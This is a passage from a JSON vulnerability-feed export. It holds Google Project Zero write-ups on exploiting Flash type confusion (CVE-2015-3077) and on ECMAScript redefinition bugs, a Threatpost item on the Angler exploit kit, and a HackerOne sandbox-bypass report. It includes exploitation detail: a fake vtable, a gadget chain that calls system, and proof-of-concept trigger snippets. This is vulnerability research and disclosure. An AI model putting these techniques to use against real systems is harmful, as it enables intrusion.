00 XX XX YY\n\n04: QQ XX ZZ 00\n\n08: 00 00 00 00\n\n \n\n\nThis guarantees that if the original pointer is an SNaN, none of the unaligned values will be SNaNs (as YY will always have bit 5 unset if the original float is an SNaN). It is not possible to do this with two consecutive pointers (unless they are known to both be SNaNs), though as the layout would then be:\n\n \n\n\n00: 00 XX XX YY\n\n04: QQ XX ZZ 00\n\n08: 00 XX XX XX \n\n0C: QQ XX ZZ 00 \n\n10: 00 00 00 00\n\n \n\n\nThe float at 0x08 has bits 22 to 31 unconstrained, so it could end up being an SNaN and be written incorrectly.\n\n \n\n\nSo it is possible to write any pointer to a float array, regardless of whether it is an SNaN or not an SNaN, but it can only be done once. After the initial pointer has been written, all additional pointers need to be an SNaN if the original pointer was an SNaN and not an SNaN if the original pointer was not an SNaN. This exploit manages this constraint by only ever writing one pointer to any ConvolutionFilter.matrix array.\n\n \n\n\nFor the fake Bitmap and fake Bitmap bits, this is easy, as they only need to contain one pointer. The challenge is that the fake vtable can only contain one pointer. This makes it difficult to both set up parameters for a call and make a call.\n\n \n\n\nA good solution would be to move to a buffer that is fully modifiable after the first call to the vtable. Fortunately, the BitmapData class (which the fake bitmap is emulating) has a method, [paletteMap](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000798.html>) which creates such a buffer. This method has four parameters (redArray, greenArray, blueArray and alphaArray) which are ActionScript arrays of Numbers. When this method is called, they are converted to integers, and copied to a native Array of ints. Then, another native method with four pointers to this array (at appropriate offsets for the input arrays) is called. This method then makes the virtual call that jumps into the fake vtable.\n\n \n\n\nAs a part of the initial call, the array pointers are stored in x64 registers r12, r13, r14 and r15. This is very useful, as it makes pointers to four controllable buffers available. The single pointer in the fake vtable is then the following gadget:\n\n \n\n\nmov rdi, r13\n\ncall [r12]\n\n \n\n\nThe buffer at r13 is set to the string \u201cgedit\u201d, and the buffer at r12 is set to a pointer to a gadget in the Flash library that calls the method system (with no concerns about SNaNs). This will cause gedit to be launched when the virtual call into the fake vtable is made.\n\n \n\n\nThis exploit is deterministic up to this point, though it does not exit cleanly (the Flash player crashes when gedit is exited). This should be fairly trivial to fix by putting multiple calls into the four available buffers, though. Even if this was fixed, it is not able to survive the destruction of the Flash Player (for example, if the tab is closed, or the swf is refreshed). This is because calling the destructor of the filter objects will cause crashes due to confusion of pointers to ConvolutionFilter matrix arrays with pointers to BitmapData objects. These objects are allocated on different heaps, so calling delete on one object when the other was expected will lead to a crash. It is not possible to correct this by type confusing these objects \u2018back\u2019 to a good state, as type confusion in this specific bug creates a copy of the object, so the original bad object will remain, and still need to be freed. It is also not possible to fix the problem by setting the parameters on the original object, as the BitmapData object and matrix object setters attempt to delete any existing object before setting it. It is possible to avoid this crash while the exploit in is progress, and as long as the player remains open, by retaining references to the objects so they won\u2019t be freed. The crash will still occur when the player is destroyed though. That said, it should be possible for the code executed by the exploit to avoid the crash by correcting the type confused objects in memory, either by putting them in a correct state, or setting their destructor pointers to null. This is not implemented in this proof-of-concept exploit though.\n\n \n\n\nWhat Makes this Bug Reliable?\n\n \n\n\nWhile type confusion is generally exploitable, there are a few factors that make CVE-2015-3077 especially amenable to reliable exploitation.\n\n \n\n\nWhen type confusion is triggered, it always includes two types, the original type of the vulnerable object when it is instantiated, and the confused type that it becomes after the vulnerability is triggered. How the original type object members align with the confused type object members has a big impact on the exploitability and the reliability of the issue. In this case, vulnerable original type members (i.e. pointers) line up with confused type members that can be directly manipulated by the attacker and vice versa. This is a best case scenario that leads to reliable exploitation. Another common scenario is where the vulnerable original type members extend past the confused type members and their values are determined by out-of-bounds memory. This situation is usually exploitable, though not as reliably, as it can be difficult to ensure that heap blocks line up with the object in memory as expected. Another possibility is that there are limits on how objects can be manipulated, for example, the original type object\u2019s members can only be set to a limited number of values, and the confused object can only be read, or only have one specific method called on it. This situation tends to either be exploitable or not, based on the specific nature of the bug, and can also lead to bugs such as info leaks that need to be combined with other bugs to be exploitable. It is possible that this type of bug could be exploited reliably, but it would need to be a very \u2018lucky\u2019 bug that happens to have the right members with the right values.\n\n \n\n\nAnother aspect of this bug is that type confusion occurs at the end of the vulnerable function that causes the confusion. This is important because it means that an object can be confused, and then never manipulated in a way that the attacker doesn\u2019t want it manipulated. Some type confusion bugs can be unreliable or unexploitable because methods that are called after the confusion occur use the type confused objects in ways that expect it to be valid when it is not. Note that in the exploit above, the MovieClip object that the type confused field occurs in is set to have 0 by 0 dimensions. This prevents certain calls to the filter objects that could cause unreliability from occurring, as filters do not need to be applied to an object with no pixels. \n\n \n\n\nAlso, in this bug, object members outside of the ones that the attacker chooses to access are not used by the software. This is another problem that can impact the reliability and exploitability of type confusion bugs. Sometimes, a non-useful (from an attack perspective) member can cause crashes if it\u2019s not possible for the attacker to correct it. Once again, setting the MovieClip to 0 by 0 prevents this, as filter methods are not accessed by Flash for an image with no pixels.\n\n \n\n\nFinally, the ability to hold a reference to both the original and confused objects is important, as it prevents garbage collection, which almost always leads to a crash if it\u2019s called on a type-confused object. Garbage collection assumes that object members are \u2018correct\u2019 in certain ways, such as containing valid pointers, which can cause crashes if this is not true, and it is usually not possible for an attacker to correct this, as garbage collection can occur at any time, so any window of invalidity is a problem. The only completely reliable solution is to prevent garbage collection while the objects are valid.\n\n \n\n\nConclusion\n\n \n\n\nA number of factors, including the layout of the original and confused objects members, how and when the object is used and whether the object is subject to garbage collection can affect the reliability of a type confusion bug. CVE-2015-3077 is an especially high-quality bug that can be exploited very reliably due to a convergence of these factors. Exploiting this bug required triggering the bug up to 31 times: eight times to get and set the object members needed for the exploit and 19 to 23 times for float conversion, depending on the number of SNaNs that occur. While this may seem large, the exploit is reliable because each step is deterministic and does not rely on any behaviour that is not guaranteed to occur. \n\n \n\n", "modified": "2015-07-20T00:00:00", "published": "2015-07-20T00:00:00", "id": "GOOGLEPROJECTZERO:971269B316D34538F3E678FE9B6B6772", "href": "https://googleprojectzero.blogspot.com/2015/07/one-perfect-bug-exploiting-type_20.html", "type": "googleprojectzero", "title": "\nOne Perfect Bug: Exploiting Type Confusion in Flash\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-14T19:21:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n<script>\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\u201chello\u201d);\n\n</script>\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below\n\n \n\n\nHow to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator is the simplest way to redefine an object or function and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters method is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes it as a BitmapData object. When the constructor is called, its type is set to FileReference, even though it is not the type that is returned. This leads to an object with an AS object type and native object type that are inconsistent, and therefore type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which can allow behaviour which isn\u2019t possibly when simply setting a property, such as returning a different value each time a property is accessed. ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value->nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where calls to conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k < 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix getter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the matrix, it calls valueOf to convert the contents of the array to members of the Number class. However, if the valueOf function also calls the matrix getter, it will delete the matrix array, and reallocate it, even though the previous call isn\u2019t complete, and will write to it after the second call returns. This leads to a use-after-free bug. \n\n \n\n\nCVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leaks which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. This leads to type confusion when the variable is used, assumed to be an ActionScript object and used as a pointer as opposed to a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the URL property of a NetConnection object, and when it attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it occurs after type checking, otherwise the function would fail to execute if called as a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype keyword.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods are called when resolution of a property or method fails, as a last resort. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. In JavaScript, there are a series of __lookUp*__ methods, such as __lookUpGetter__ which serve the same purpose (the specific method that get calls depends exactly on what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out what properties of the object the method is accessing, which can then be modified further\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:49", "bulletinFamily": "info", "cvelist": ["CVE-2015-0336", "CVE-2015-0359", "CVE-2015-3090"], "description": "While the Angler Exploit Kit may have already established itself as one of the more [sophisticated kits](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>) on the underground market, it appears it\u2019s still finding ways to evolve.\n\nAngler, this week, was spotted dropping the latest iteration of CryptoWall ransomware and leveraging yet another previously patched Adobe vulnerability.\n\nEarlier this year, the kit was spotted pushing a ransomware hybrid of sorts, [a cross between TeslaCrypt and AlphaCrypt](<https://threatpost.com/angler-exploit-kit-pushing-new-unnamed-ransomware/112751>), along with a handful of Adobe exploits, and instances of the [Bedep Trojan](<https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611>), which goes on to perpetrate click fraud.\n\nBrad Duncan, a handler at SANS Internet Storm Center claims he noticed two instances of Angler sending out Cryptowall 3.0 this week. In the first incident on Tuesday he spotted the kit dropping Bedep as a payload before it moved onto the CryptoWall 3.0. In a separate instance on Wednesday, he observed Angler sending Cryptowall 3.0 on its own.\n\nBoth times, Duncan claims, the ransomware used the same Bitcoin address for payment. Cryptowall also requested the usual figure, $500, to decrypt the victim\u2019s files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/05/07003952/2015-05-28-ISC-diary-image-01.jpg>)\n\n\u201cI usually see Angler EK send different types of ransomware, and I\u2019ve seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I\u2019ve noticed CryptoWall from Angler EK,\u201d Duncan wrote in a post on [SANS\u2019 InfoSec Community Forums Thursday](<https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737/>).\n\nThe exploit kit added yet another Adobe Flash Player vulnerability to its arsenal this week, [according to FireEye](<https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html>). A quartet of researchers noticed Angler exploiting CVE-2015-3090 on Tuesday, [about two weeks](<https://threatpost.com/adobe-unleashes-big-updates-for-flash-reader-acrobat/112756>) after [Adobe](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) actually patched the issue, a memory corruption vulnerability dug up by Chris Evans at Google\u2019s Project Zero.\n\nThe kit uses the vulnerability to exploit a race condition in the [shader class](<http://www.sfml-dev.org/documentation/2.0/classsf_1_1Shader.php>) and trigger the vulnerability, making it possible for attackers to execute arbitrary code and infect the systems of users who haven\u2019t updated yet.\n\nThe addition of Adobe exploits to Angler certainly isn\u2019t new by any means but as FireEye points out, it is worrisome.\n\n[In January ](<https://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>)the kit added two Flash vulnerabilities, including a zero day that went onto install Bedep on victims\u2019 machines. In April the kit began exploiting CVE-2015-0359 in Flash and in March it narrowed its sights on CVE-2015-0336, also in Flash, along with [an IE vulnerability](<https://threatpost.com/older-keen-team-use-after-free-ie-exploit-added-to-angler-exploit-kit/111350>).\n\nThe kit matured further in March, adding a nifty trick called [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>) wherein pilfered domain credentials are used to build lists of subdomains and then used to redirect victims to attack sites.\n", "modified": "2015-06-01T17:43:55", "published": "2015-05-28T13:57:47", "id": "THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3", "href": "https://threatpost.com/angler-exploit-kit-exploiting-new-adobe-vulnerability-dropping-cryptowall-3-0/113044/", "type": "threatpost", "title": "Angler Exploit Kit Exploiting New Adobe Vulnerability, Dropping Cryptowall 3.0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-10-23T18:01:34", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2015-3044"], "description": "Some of the sandbox logic of Flash Player can be circumvented on most web browsers by using special URL schemes. A website can deploy an SWF file via the data: or blob: URL schemes (perhaps others). An app started in this way runs in the \"local with files\" or \"local with networking\" sandbox, depending on the SWF attributes. This bug can be used in conjunction other attacks such as the Firefox-specific bug reported separately or MITM (CVE-2015-3044) to promote the local sandbox to \"local trusted\". This would allow unlimited cross-domain access.\r\n\r\nOn Chrome, the SWF can simply be encoded in a data: URL. This doesn't appear to work on other browsers (maybe there is a limit on the URL length or something else). On Firefox, Safari (recent versions, not version 5), and Chrome also allow loading the SWF from a blob: URL. On Firefox this apparently requires prefixing the URL with \"feed:\".\r\n\r\nThe vulnerability was patched in May 2015.\r\n", "modified": "2019-10-18T13:00:15", "published": "2015-06-30T14:33:56", "id": "H1:73276", "href": "https://hackerone.com/reports/73276", "type": "hackerone", "title": "Flash (IBB): Internet-based attacker can run Flash apps in local sandboxes by using special URL schemes (PSIRT-3299, CVE-2015-3079)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}